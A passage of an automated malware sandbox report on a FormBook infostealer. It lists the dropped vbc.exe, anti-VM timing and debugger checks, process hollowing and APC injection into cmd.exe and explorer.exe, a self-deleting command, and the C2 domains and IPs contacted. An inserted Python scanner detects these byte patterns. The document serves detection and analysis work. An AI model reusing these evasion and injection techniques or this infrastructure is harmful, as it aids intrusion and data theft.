Source: C:\Users\Public\vbc.exe Code function: 4_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress, 4_2_00405DA3

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nsuBDB6.tmp\vdobpgi.dll Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe RDTSC instruction interceptor: First address: 00000000000C8604 second address: 00000000000C860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe RDTSC instruction interceptor: First address: 00000000000C899E second address: 00000000000C89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2832 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 2984 Thread sleep time: -32000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088D0 rdtsc 5_2_004088D0
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\cmd.exe API coverage: 0.9 %
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405D7C FindFirstFileA,FindClose, 4_2_00405D7C
Source: C:\Users\Public\vbc.exe Code function: 4_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 4_2_004053AA
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402630 FindFirstFileA, 4_2_00402630
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3E0202 FindFirstFileW,GetFullPathNameW,RemoveDirectoryW,RemoveDirectoryW,GetLastError,GetLastError,GetFileAttributesW,SetFileAttributesW,RemoveDirectoryW,GetLastError, 7_2_4A3E0202
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3C2E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 7_2_4A3C2E73
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3C6E47 GetFileAttributesW,FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 7_2_4A3C6E47
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3DBF0C FindFirstFileW,FindNextFileW,FindClose, 7_2_4A3DBF0C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3CBBA4 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,FindNextFileW,GetLastError,FindClose, 7_2_4A3CBBA4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3E0492 FindFirstFileW,FindFirstFileW,FindClose,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetLastError,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,FindNextFileW,FindClose, 7_2_4A3E0492
Source: C:\Users\Public\vbc.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\vbc.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000006.00000000.469616114.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.484933036.000000000457A000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.484933036.000000000457A000.00000004.00000001.sdmp Binary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________D
Source: explorer.exe, 00000006.00000000.484933036.000000000457A000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.466928021.0000000000324000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000006.00000000.484790298.00000000044E7000.00000004.00000001.sdmp Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 00000006.00000000.469642835.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.536470326.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress, 4_2_00405DA3
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3C727F GetProcessHeap,HeapFree, 7_2_4A3C727F
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088D0 rdtsc 5_2_004088D0
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 4_2_0018EADA mov eax, dword ptr fs:[00000030h] 4_2_0018EADA
Source: C:\Users\Public\vbc.exe Code function: 4_2_0018EC08 mov eax, dword ptr fs:[00000030h] 4_2_0018EC08
Source: C:\Users\Public\vbc.exe Code function: 4_2_0018EBCA mov eax, dword ptr fs:[00000030h] 4_2_0018EBCA
Source: C:\Users\Public\vbc.exe Code function: 4_2_0018EB8B mov eax, dword ptr fs:[00000030h] 4_2_0018EB8B
Source: C:\Users\Public\vbc.exe Code function: 4_2_0018E8C6 mov eax, dword ptr fs:[00000030h] 4_2_0018E8C6
Source: C:\Users\Public\vbc.exe Code function: 5_2_007426F8 mov eax, dword ptr fs:[00000030h] 5_2_007426F8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023F26F8 mov eax, dword ptr fs:[00000030h] 7_2_023F26F8
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409B40 LdrLoadDll, 5_2_00409B40
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3C13A9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_4A3C13A9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3C7C63 SetUnhandledExceptionFilter, 7_2_4A3C7C63
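The three code-level signatures raised above are all plain byte patterns: the "push X; ret / retf / iretd" hits listed under Data Obfuscation (5_2_0041504B and following), the two RDTSC reads six bytes apart that the RDTSC interceptor reports at 0x408604 and 0x40860A, and the "mov eax, dword ptr fs:[00000030h]" PEB reads at 4_2_0018EADA and following. The scanner below re-implements those heuristics so the hits can be reproduced on a memory dump of vbc.exe or of the injected region in cmd.exe. It is an added example, not Joe Sandbox code: SAMPLE is constructed from the instruction listings in this report rather than taken from the dropped binary, its offsets are arbitrary, and the 16-byte RDTSC window and the set of push encodings it recognises are this example's own choices.

```python
"""
Byte-level re-implementation of three heuristics this report applies to
dumped code: "push X; ret" control transfer (call obfuscation), two RDTSC
reads a few bytes apart (timing / VM check) and a PEB read via fs:[30h].
Added example, not Joe Sandbox code. SAMPLE is constructed from the
instruction listings in the report; offsets are arbitrary.
"""
import re

# push r32 (50-57) or push es/cs/ss/ds (06/0E/16/1E) followed by ret (C3),
# retf (CB) or iretd (CF): the idiom behind the report's "push eax; ret",
# "push esi; retf" and "push ds; iretd" hits.
PUSH_REG_RET = re.compile(rb"[\x50-\x57\x06\x0e\x16\x1e][\xc3\xcb\xcf]")
# push dword ptr [imm32]; ret  (FF 35 xx xx xx xx C3), as at 5_2_0041BCFD.
PUSH_MEM_RET = re.compile(rb"\xff\x35.{4}\xc3", re.DOTALL)
RDTSC = b"\x0f\x31"                      # rdtsc
PEB_READ = b"\x64\xa1\x30\x00\x00\x00"   # mov eax, dword ptr fs:[30h]

PUSH_NAMES = {0x06: "es", 0x0E: "cs", 0x16: "ss", 0x1E: "ds",
              0x50: "eax", 0x51: "ecx", 0x52: "edx", 0x53: "ebx",
              0x54: "esp", 0x55: "ebp", 0x56: "esi", 0x57: "edi"}
RET_NAMES = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}


def find_all(code, needle):
    """Every offset at which `needle` occurs in `code` (overlaps allowed)."""
    out, i = [], code.find(needle)
    while i != -1:
        out.append(i)
        i = code.find(needle, i + 1)
    return out


def scan(code, base=0, rdtsc_window=16):
    """Return {rule: [hits]} with offsets rebased to `base`.

    rdtsc_window is the maximum distance in bytes between two RDTSC
    instructions for them to count as one timing check; 16 is this
    example's own choice, wide enough for the 6-byte gap in the report.
    """
    hits = {"push_ret": [], "rdtsc_pair": [], "peb_read": []}
    for m in PUSH_REG_RET.finditer(code):
        text = "push %s; %s" % (PUSH_NAMES[m.group()[0]], RET_NAMES[m.group()[1]])
        hits["push_ret"].append((base + m.start(), text))
    for m in PUSH_MEM_RET.finditer(code):
        imm = int.from_bytes(m.group()[2:6], "little")
        hits["push_ret"].append((base + m.start(), "push dword ptr [%08Xh]; ret" % imm))
    hits["push_ret"].sort()
    rd = find_all(code, RDTSC)
    for a, b in zip(rd, rd[1:]):
        if b - a <= rdtsc_window:
            hits["rdtsc_pair"].append((base + a, base + b))
    hits["peb_read"] = [base + off for off in find_all(code, PEB_READ)]
    return hits


# Constructed sample built from the report's own listings, padded with NOPs.
SAMPLE = (
    b"\x90" * 4
    + b"\x1e\xcf"                          # push ds; iretd      (5_2_0041504B)
    + b"\x90" * 2
    + b"\x50\xc3"                          # push eax; ret       (5_2_0041B822)
    + b"\x56\xcb"                          # push esi; retf      (5_2_00416239)
    + b"\xff\x35\xc0\x34\x2c\x4e\xc3"      # push dword ptr [4E2C34C0h]; ret
    + b"\x90" * 3
    + b"\x0f\x31\x33\xc9\x03\xc8\x0f\x31"  # rdtsc; xor ecx,ecx; add ecx,eax; rdtsc
    + b"\x90" * 2
    + b"\x64\xa1\x30\x00\x00\x00"          # mov eax, dword ptr fs:[30h]
    + b"\x90" * 4
)

if __name__ == "__main__":
    for rule, found in scan(SAMPLE, base=0x400000).items():
        for hit in found:
            print(rule, hit)
```

All three patterns also occur in ordinary compiler and CRT output; the report itself records a "push ecx; ret" and an fs:[30h] read inside cmd.exe. Treat these hits as supporting evidence for the verdict, not as the verdict: the process hollowing, the APC queueing and the process tree are what carry the FormBook classification here.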

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 172.67.178.13 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.chiplorain.com
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.louisesshop.com
Source: C:\Windows\explorer.exe Domain query: www.atlantahousingsolutions.com
Source: C:\Windows\explorer.exe Domain query: www.searakloset.com
Source: C:\Windows\explorer.exe Domain query: www.lauraimoveis.com
Source: C:\Windows\explorer.exe Network Connect: 156.67.74.112 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 172.67.207.77 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 4A3C0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Thread register set: target process: 1764 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe" Jump to behavior
Source: explorer.exe, 00000006.00000000.469837109.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.534448161.0000000000750000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.534240186.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.469616114.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.469837109.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.534448161.0000000000750000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.469837109.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.534448161.0000000000750000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\cmd.exe Code function: GetDateFormatW,realloc,GetDateFormatW,_wcsicmp,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,memmove,GetSystemTime,SystemTimeToFileTime,memmove,GetLastError,realloc, 7_2_4A3D270D
Source: C:\Windows\SysWOW64\cmd.exe Code function: _wcsicmp,GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,memmove,GetLocaleInfoW,GetTimeFormatW, 7_2_4A3CD701
Source: C:\Windows\SysWOW64\cmd.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 7_2_4A3C88D9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3D4E44 GetSystemTime,SystemTimeToFileTime, 7_2_4A3D4E44
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA, 4_2_00405AA7

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000006.00000000.487305412.0000000009552000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.670422841.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.670529707.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505237458.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.670482603.0000000000290000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505715407.00000000023E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.467163714.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505257053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.496333935.0000000009552000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.466568684.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.465993067.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.465344167.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000006.00000000.487305412.0000000009552000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.670422841.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.670529707.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505237458.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.670482603.0000000000290000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505715407.00000000023E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.467163714.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505257053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.496333935.0000000009552000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.466568684.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.465993067.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.465344167.0000000000400000.00000040.00000001.sdmp, type: MEMORY